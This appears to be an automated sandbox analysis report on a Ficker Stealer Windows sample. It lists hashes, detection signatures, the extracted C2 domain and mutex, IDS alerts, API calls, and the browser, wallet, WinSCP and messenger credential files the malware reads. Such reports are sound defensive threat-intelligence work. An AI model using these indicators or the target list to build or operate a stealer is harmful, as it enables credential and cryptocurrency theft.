Analysis Report 8s7bEDfYhT.exe

Overview

General Information

Sample Name: 8s7bEDfYhT.exe
Analysis ID: 397819
MD5: e0f6d15001d810320bbe9614c9365ca6
SHA1: f589ae105a5b33e6fcca8afc7f8688652f7c5392
SHA256: f009a71cf1050cc8c50a9b1accf3e28f174e75eda5f5ebb4764d90baa443aa9c
Tags: exe, FickerStealer

Detection

Ficker Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ficker Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
May check the online IP address of the machine
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Is looking for software installed on the system
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • 8s7bEDfYhT.exe (PID: 6520 cmdline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe' MD5: E0F6D15001D810320BBE9614C9365CA6)
    • 8s7bEDfYhT.exe (PID: 6572 cmdline: 'C:\Users\user\Desktop\8s7bEDfYhT.exe' MD5: E0F6D15001D810320BBE9614C9365CA6)
  • cleanup

Malware Configuration

Threatname: Ficker Stealer

{"C2 list": ["sodaandcoke.top:80"], "Mutex": ["serhershesrhsfesrf"], "Blacklist Country": ["ru-RU", "be-BY", "uz-UZ", "ua-UA", "hy-AM", "kk-KZ", "az-AZ"]}

Yara Overview

Memory Dumps

Source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Author: Joe Security
Source: Process Memory Space: 8s7bEDfYhT.exe PID: 6572, Rule: JoeSecurity_Ficker_Stealer_1, Description: Yara detected Ficker Stealer, Author: Joe Security

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      AV Detection:

      Found malware configuration
      Source: 2.2.8s7bEDfYhT.exe.4915a0.1.raw.unpack, Malware Configuration Extractor: Ficker Stealer {"C2 list": ["sodaandcoke.top:80"], "Mutex": ["serhershesrhsfesrf"], "Blacklist Country": ["ru-RU", "be-BY", "uz-UZ", "ua-UA", "hy-AM", "kk-KZ", "az-AZ"]}
      Multi AV Scanner detection for domain / URL
      Source: sodaandcoke.top, Virustotal: Detection: 6%
      Source: sodaandcoke.top:80, Virustotal: Detection: 6%
      Multi AV Scanner detection for submitted file
      Source: 8s7bEDfYhT.exe, Virustotal: Detection: 55%
      Source: 8s7bEDfYhT.exe, ReversingLabs: Detection: 89%
      Machine Learning detection for sample
      Source: 8s7bEDfYhT.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_0040BA42 CryptUnprotectData,memmove,LocalFree,3_2_0040BA42
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_0040CECA CryptUnprotectData,memmove,LocalFree,3_2_0040CECA

      Compliance:

      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Unpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack
      Source: 8s7bEDfYhT.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_0042BBF8 memset,FindFirstFileW,memcpy,memcpy,GetLastError,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memcpy,memmove,memcpy,memcpy,memcpy,memmove,CloseHandle,memcpy,memcpy,3_2_0042BBF8

      Networking:

      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.6:49714 -> 35.203.73.169:80
      Source: Traffic, Snort IDS: 2031132 ET TROJAN Win32/Ficker Stealer Activity M3 192.168.2.6:49722 -> 35.203.73.169:80
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: sodaandcoke.top:80
      May check the online IP address of the machine
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, DNS query: name: api.ipify.org
      Source: Joe Sandbox View, IP Address: 54.225.155.255
      Source: global traffic, HTTP traffic detected:
        GET /?format=xml HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: api.ipify.org
        Connection: Keep-Alive
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_0042A675 recv,WSAGetLastError,WSAGetLastError,3_2_0042A675
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, String found in binary or memory: rsion":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*G[o equals www.facebook.com (Facebook)
      Source: unknown, DNS traffic detected: queries for: api.ipify.org
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339905061.00000000007E9000.00000004.00000001.sdmp, String found in binary or memory: http://api.ipify.org/?format=xml
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmp, String found in binary or memory: http://api.ipify.org/?format=xmliC:
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInst9n
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmp, String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339794600.0000000000827000.00000004.00000001.sdmp, String found in binary or memory: https://login.live.com
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmp, String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmp, String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmp, String found in binary or memory: https://support.google.com/chrome/answer/6258784
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: 3_2_004157AC LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00429350: GetFileInformationByHandle,memset,DeviceIoControl,3_2_00429350
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: String function: 0040CECF appears 45 times
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: String function: 004041C4 appears 71 times
      Source: 8s7bEDfYhT.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350370946.00000000007A0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dllj% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350366600.0000000000790000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamemswsock.dll.muij% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350376966.00000000007B0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs 8s7bEDfYhT.exe
      Source: 8s7bEDfYhT.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engine, Classification label: mal100.phis.troj.spyw.evad.winEXE@3/2@3/2
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00426164 memset,GetModuleHandleW,FormatMessageW,GetLastError,3_2_00426164
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_0044CFD0 GetCompressedFileSizeA,OpenWaitableTimerW,GetConsoleAliasW,SetFileTime,GlobalFindAtomW,DisconnectNamedPipe,FindAtomW,GlobalUnlock,GetModuleHandleExW,GetCurrentProcess,FileTimeToSystemTime,_wscanf,SetTimeZoneInformation,SetTapeParameters,GlobalWire,TzSpecificLocalTimeToSystemTime,SetWaitableTimer,_calloc,_calloc,_wscanf,_memset,__vswprintf_c_l,_calloc,_feof,LocalAlloc,lstrcatW,GetModuleHandleW,GetProcAddress,VirtualProtect,SetSystemTimeAdjustment,GetFileAttributesW,TerminateProcess,SizeofResource,InterlockedIncrement,InterlockedIncrement,SetFileAttributesA,WriteConsoleOutputCharacterW,SetFileAttributesA,WriteConsoleOutputCharacterW,OpenWaitableTimerW,GetAtomNameA,SetConsoleScreenBufferSize,GetAtomNameA,SetConsoleScreenBufferSize,2_2_0044CFD0
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Mutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, File read: C:\Windows\System32\drivers\etc\hosts
      Source: unknown, Process created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe'
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Process created: C:\Users\user\Desktop\8s7bEDfYhT.exe 'C:\Users\user\Desktop\8s7bEDfYhT.exe'

      Data Obfuscation:

      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Unpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack .text:ER;.data:W;.kug:R;.tls:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;.data:W;.rdata:R;/4:R;.bss:W;.idata:W;.CRT:W;.tls:W;
      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Unpacked PE file: 3.2.8s7bEDfYhT.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_004112C5 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,2_2_004112C5
      Source: 8s7bEDfYhT.exe, Static PE information: section name: .kug
      Source: 8s7bEDfYhT.exe, Static PE information: section name: .new
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_00404209 push ecx; ret 2_2_0040421C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_0047BA98 push AF0044FCh; retf 0041h 2_2_0047BA9D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_004034D9 push ecx; ret 2_2_004034EC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00435DC0 push dword ptr [eax+04h]; ret 3_2_00435DEF
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00437605 push ss; ret 3_2_00437606
      Source: initial sample, Static PE information: section name: .text entropy: 7.54573831986
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: 8s7bEDfYhT.exe, 00000003.00000003.339808670.000000000082F000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW,
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAWp6
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_004020C8 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004020C8
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_00423341 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_00423341
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_0041B841 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041B841
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_00403994 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00403994
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 2_2_0040AD9D SetUnhandledExceptionFilter,2_2_0040AD9D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,3_2_0040115C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,3_2_00401150
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,3_2_004013C9
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00434F7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_00434F7C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: 3_2_00434F80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_00434F80
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: GetLocaleInfoW,2_2_0042207D
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: EnumSystemLocalesA,2_2_0041E804
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,2_2_0041C824
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0041E82E
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,2_2_0041E8D1
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,2_2_0041E895
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe, Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,2_2_00422096
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_0041C1B6
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: GetLocaleInfoA,2_2_00424A53
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,2_2_0041CAAF
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0041E34C
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,2_2_004113CD
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_0041E463
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_0041E4FB
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: GetLocaleInfoA,2_2_00423D45
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,2_2_0041E56F
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,2_2_0041CD75
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: LCMapStringA,GetLocaleInfoW,2_2_0044CEC0
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,2_2_0041E741
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,CreateMutexA,memset,GetUserDefaultLocaleName,LoadLibraryA,LoadLibraryA,GetProcAddress,URLDownloadToFileA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,memset,SetLastError,GetModuleFileNameW,GetLastError,GetLastError,GetLastError,GetComputerNameW,GetDesktopWindow,GetWindowRect,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesW,GetTimeZoneInformation,GetKeyboardLayoutList,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryInfoKeyW,memset,RegEnumKeyExW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,CloseHandle,CloseHandle,GetProcessHeap,GetSystemMetrics,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,closesocket,closesocket,memset,SetLastError,GetTempPathW,GetLastError,GetLastError,CloseHandle,LoadLibraryA,GetProcAddress,CreateProcessA,closesocket,GetLastError,3_2_004157AC
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\Documents VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Local\Application Data VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: 2_2_0040B896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040B896
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Code function: 2_2_00424116 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,2_2_00424116
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      Yara detected Ficker Stealer
      Source: Yara match File source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: 8s7bEDfYhT.exe PID: 6572, type: MEMORY
      Found many strings related to Crypto-Wallets (likely being stolen)
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\walletsDatakings
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350451817.000000000082F000.00000004.00000020.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp String found in binary or memory: Update for Microsoft Office 2016 (KB3178666) 32-Bit Editioning\Exodus\exodus.walletINetCacheA
      Source: 8s7bEDfYhT.exe, 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\keystoreettingsB
      Tries to harvest and steal Bitcoin Wallet information
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Local State
      Tries to steal Instant Messenger accounts or passwords
      Source: C:\Users\user\Desktop\8s7bEDfYhT.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

      Remote Access Functionality:

      Yara detected Ficker Stealer
      Source: Yara match File source: 00000003.00000002.350405837.00000000007D8000.00000004.00000020.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: 8s7bEDfYhT.exe PID: 6572, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
